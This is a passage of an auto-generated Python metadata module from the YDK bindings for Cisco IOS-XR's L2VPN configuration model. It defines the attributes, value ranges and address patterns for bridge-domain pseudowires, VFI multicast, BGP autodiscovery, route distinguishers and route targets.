'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' Two byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable LDP as Signaling Protocol
.Deletion of this object also causes
deletion of all objects under
LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
